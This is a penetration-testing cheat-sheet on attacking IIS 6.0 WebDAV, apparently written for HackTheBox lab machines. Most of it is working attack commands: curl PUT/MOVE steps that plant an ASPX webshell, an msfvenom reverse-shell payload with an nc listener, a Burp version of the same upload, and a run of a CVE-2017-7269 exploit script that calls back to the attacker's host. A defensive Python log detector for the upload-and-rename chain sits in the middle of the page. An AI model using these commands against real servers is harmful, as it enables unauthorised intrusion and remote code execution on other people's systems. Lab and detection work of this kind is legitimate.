# IIS6 WebDav

## Microsoft Windows 2003|2008|XP

* google 'iis 6.0 reverse shell'
* Microsoft-IIS/6.0
* http-webdav-scan
* WebDAV allows clients to perform Web authoring operations remotely.
* REF: [Granny/Grandpa-HTB](/04-webapps/iis6-webdav.md)
* [https://github.com/ohpe/juicy-potato/releases](https://github.com/ohpe/juicy-potato/releases)

## nmap finds webdav

* **nmap -sV -sC -oA nmap 10.x.x.x**
* Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK
* Options: OPTIONS, TRACE, **GET**, HEAD, DELETE, **PUT**, POST, COPY, **MOVE**
* GET - download
* PUT - upload
* MOVE - rename/move (a rename can also change the file extension)

## davtest

```
> davtest -url http://10.x.x.x
```

## cadaver

```
> cadaver http://10.x.x.x
d> ls                          ..list
d> put shell.aspx              ..403 Forbidden
d> put shell.txt               ..ok
d> move shell.txt shell.aspx   ..ok
```

## PUT/MOVE

* Scenario:
  * Can 'put' text - upload
  * NOT 'put' aspx
  * Can 'move' aspx

```
------------------
Test:
curl -X PUT http://10.x.x.x/hello.txt -d @hello.txt
curl http://10.x.x.x/hello.txt

------------------
webshell:
cp /usr/share/webshells/aspx/cmdasp.aspx .
curl -X PUT http://10.x.x.x/payload.txt -d @cmdasp.aspx
curl -X MOVE -H 'Destination:http://10.x.x.x/payload.aspx' http://10.x.x.x/payload.txt
http://10.x.x.x/payload.aspx
Command: whoami 'execute' button
network service

------------------
reverse:
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=4444 -f aspx > reverse.aspx
curl -X PUT http://10.x.x.x/reverse.txt --data-binary @reverse.aspx
curl -X MOVE -H 'Destination:http://10.x.x.x/reverse.aspx' http://10.x.x.x/reverse.txt
curl http://10.x.x.x/reverse.aspx
http://10.x.x.x/reverse.aspx
nc -nlvp 4444
```

## Burp

```
Proxy 10.x.x.x: 80
Burp > Intercept
PUT  > Send to repeater
PUT /ippsec.html HTTP/1.1
this is a test
http://10.x.x.x/ippsec.html  .. works!

msfvenom -p windows/shell_reverse_tcp LHOST=10.x.x.x LPORT=4444 -f aspx
copy/paste the text of aspx msfvenom
paste into burp (bottom)
PUT /ippsec.html HTTP/1.1    ..html ok
PUT /ippsec.aspx HTTP/1.1    ..aspx forbidden!

OPTIONS / HTTP/1.1           ..shows list of webdav options
MOVE /ippsec.html HTTP/1.1   ..move html
Destination: /ippsec.aspx    ..aspx!
http://10.x.x.x/ippsec.aspx
nc -nvlp 4444
Connected!
```
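The PUT-then-MOVE chain shown in the two sections above (curl and Burp) leaves a recognisable trail in the IIS W3C logs. As an added defender-side example that is not part of this page's notes or tooling, the hypothetical detector below flags a rejected PUT of a script extension, a successful PUT followed by a MOVE of the same resource from one client, and a later GET of a script file with that same base name. It assumes the default IIS 6 W3C field order and constructed sample log lines; IIS does not log the MOVE `Destination` header, so the rule pairs the MOVE with the earlier PUT by path instead.

```python
import os
from collections import defaultdict

# Extensions IIS 6 hands to the ASP.NET/ASP script engines.
SCRIPT_EXTS = {".aspx", ".asp", ".ashx", ".asmx"}

# Constructed sample lines (not real traffic); default IIS 6 W3C field order.
SAMPLE_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2024-01-01 10:00:00 10.0.0.5 GET /index.html - 80 - 10.0.0.9 Mozilla/5.0 200 0 0
2024-01-01 10:00:01 10.0.0.5 PUT /payload.aspx - 80 - 10.0.0.9 curl/7.88 403 1 0
2024-01-01 10:00:02 10.0.0.5 PUT /payload.txt - 80 - 10.0.0.9 curl/7.88 201 0 0
2024-01-01 10:00:03 10.0.0.5 MOVE /payload.txt - 80 - 10.0.0.9 curl/7.88 201 0 0
2024-01-01 10:00:09 10.0.0.5 GET /payload.aspx - 80 - 10.0.0.9 Mozilla/5.0 200 0 0
"""

def parse_w3c(log_text):
    """Yield (line_no, entry) for data lines; '#' lines are W3C directives."""
    for no, line in enumerate(log_text.splitlines(), 1):
        if not line or line.startswith("#"):
            continue
        f = line.split()          # IIS replaces spaces inside fields with '+'
        if len(f) < 11:
            continue
        yield no, {"method": f[3], "path": f[4], "client": f[8], "status": int(f[10])}

def detect(log_text):
    """Return (line_no, reason, path, status) tuples for the upload/rename chain."""
    alerts = []
    uploaded = defaultdict(set)   # client -> base names (no extension) PUT OK
    renamed = defaultdict(set)    # client -> base names later MOVEd OK
    for no, e in parse_w3c(log_text):
        stem, ext = os.path.splitext(e["path"])
        ext, ok = ext.lower(), 200 <= e["status"] < 300
        if e["method"] == "PUT" and ext in SCRIPT_EXTS:
            alerts.append((no, "script PUT attempt", e["path"], e["status"]))
        elif e["method"] == "PUT" and ok:
            uploaded[e["client"]].add(stem)
        elif e["method"] == "MOVE" and ok and stem in uploaded[e["client"]]:
            renamed[e["client"]].add(stem)
            alerts.append((no, "PUT followed by MOVE", e["path"], e["status"]))
        elif e["method"] == "GET" and ok and ext in SCRIPT_EXTS and stem in renamed[e["client"]]:
            alerts.append((no, "renamed upload executed", e["path"], e["status"]))
    return alerts

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

A legitimate WebDAV author can produce the same PUT/MOVE pair, so treat a hit as a hunting lead and confirm against the MOVE `Destination` (only visible on the wire or in a proxy log) and the resulting file on disk.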

## iis6-exploit

* CVE-2017-7269
* iis_shell.py
* iis6-exploit-2017-CVE-2017-**7269**
* <https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269>
* usage: iis6webdav.py RHOST RPORT LHOST LPORT

```
> nc -nvlp 4444
> python ./iis6webdav.py 10.x.x.tgt 80 10.x.x.me 4444
```

## Windows 2003

Windows Server 2003 and IIS 6.0 privilege escalation using impersonation:\
<https://www.exploit-db.com/exploits/6705/>

